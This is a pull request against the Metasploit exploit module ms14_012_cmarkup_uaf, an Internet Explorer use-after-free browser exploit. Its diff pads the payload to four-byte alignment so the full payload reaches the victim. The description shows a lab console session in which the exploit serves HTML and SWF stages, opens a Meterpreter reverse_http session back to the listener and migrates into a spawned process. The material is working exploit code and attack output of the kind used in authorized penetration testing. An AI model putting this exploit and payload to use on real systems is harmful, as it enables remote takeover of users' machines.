### PR TITLE
ms14_012_cmarkup_uaf : Be sure which the full payload is used

### DIFF
--- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
+++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
@@ -108,7 +108,13 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit_template(cli, target_info)
 
     flash_payload = ""
-    get_payload(cli,target_info).unpack("V*").each do |i|
+    padded_payload = get_payload(cli,target_info)
+
+    while padded_payload.length % 4 != 0
+      padded_payload += "\x00"
+    end
+
+    padded_payload.unpack("V*").each do |i|
       flash_payload << "0x#{i.to_s(16)},"
     end
     flash_payload.gsub!(/,$/, "")


### PR DESCRIPTION
Has been reported by Hyunjun Kim from FireEye which ms14_012_cmarkup_uaf was failing with meterpreter/reverse_http. Indeed the fault wasn't meterpreter/reverse_http, but the exploit not using the full payload unless the payload's length is multiple of 4. Since the payload length is LHOST IP length dependent, it was failing when using some LHOSTs.

The exploit now should work with windows/meterpreter/reverse_http (with the same ratio success than other payloads of course :)) , no matters what is the length of the LHOST IP:

```
msf exploit(ms14_012_cmarkup_uaf) > show options

Module options (exploit/windows/browser/ms14_012_cmarkup_uaf):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Retries     false            no        Allow the browser to retry the module
   SRVHOST     172.16.158.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     172.16.158.1     yes       The local listener hostname
   LPORT     8181             yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP1 / IE 10 / FP 12


msf exploit(ms14_012_cmarkup_uaf) >
[*] 172.16.158.145   ms14_012_cmarkup_uaf - Request: /yGWy3CpmRIrWaI
[*] 172.16.158.145   ms14_012_cmarkup_uaf - Gathering target information.
[*] 172.16.158.145   ms14_012_cmarkup_uaf - Sending response HTML.
[*] 172.16.158.145   ms14_012_cmarkup_uaf - Request: /yGWy3CpmRIrWaI/UzelV/
[*] 172.16.158.145   ms14_012_cmarkup_uaf - Request: /yGWy3CpmRIrWaI/WWtGAo/
[*] 172.16.158.145   ms14_012_cmarkup_uaf - Sending HTML...
[*] 172.16.158.145   ms14_012_cmarkup_uaf - Request: /yGWy3CpmRIrWaI/WWtGAo/KaMxem.swf
[*] 172.16.158.145   ms14_012_cmarkup_uaf - Sending SWF...
[*] 172.16.158.145   ms14_012_cmarkup_uaf - Request: /yGWy3CpmRIrWaI/WWtGAo/KaMxem.swf
[*] 172.16.158.145   ms14_012_cmarkup_uaf - Sending SWF...
[*] 172.16.158.145:49336 Request received for /jKo8...
[*] 172.16.158.145:49336 Staging connection for target /jKo8 received...
[*] Patched user-agent at offset 663656...
[*] Patched transport at offset 663320...
[*] Patched URL at offset 663384...
[*] Patched Expiration Timeout at offset 664256...
[*] Patched Communication Timeout at offset 664260...
[*] Meterpreter session 2 opened (172.16.158.1:8181 -> 172.16.158.145:49336) at 2014-08-12 11:40:24 -0500
[*] Session ID 2 (172.16.158.1:8181 -> 172.16.158.145:49336) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3512)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3748
[+] Successfully migrated to process
Interrupt: use the 'exit' command to quit
```
